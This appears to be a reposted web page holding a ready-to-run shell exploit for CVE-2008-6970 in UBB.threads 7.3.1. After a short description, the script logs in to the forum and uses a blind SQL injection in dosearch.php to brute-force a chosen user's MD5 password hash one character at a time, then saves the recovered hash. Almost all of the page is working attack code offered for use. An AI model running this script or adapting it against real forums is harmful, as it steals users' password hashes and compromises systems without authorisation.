CVE-2008-6970_UBB.threads_7.3.1_SQL注入漏洞

# CVE-2008-6970 UBB.threads 7.3.1 SQL注入漏洞
==INFO==


DESCRIPTION

Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. 

FILE

CVE-2008-6970.sh - Shell code program.

SOURCE

https://github.com/KyomaHooin/CVE-2008-6970

==CVE-2008-6970.sh==

#!/bin/sh
#
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack
#

hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)
main='http://[removed]/ubbthreads/ubbthreads.php'
login='ubb=start_page&Loginname=[removed]&Loginpass=[removed]&firstlogin=1&from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'
base="$main?ubb=dosearch&fromsearch=1&Words=body"
inject="&Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"

hash=()

replace(){
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"
}

push(){
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"
}

brute(){
	for char in ${hex[*]}; do
		#replace string
		inj=`replace "$inject" $char`
		#inject
		wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"
		#if match then return characters to hash array
		if [ -z `cat ubb | grep "There are no results"` ]; then
			hash+=($char)
			return
		fi
		rm ubb
	done
}

# INIT

#get PHPSESSID cookie
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main
#blind SQL injection brute force attack
for ((i=0; i<32;i++)); do
	brute
	inject=`push "$inject" "R"`
done
#clean
rm cookies.txt
#print the hash
printf "%s" "${hash[@]}" >> hash.txt


© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容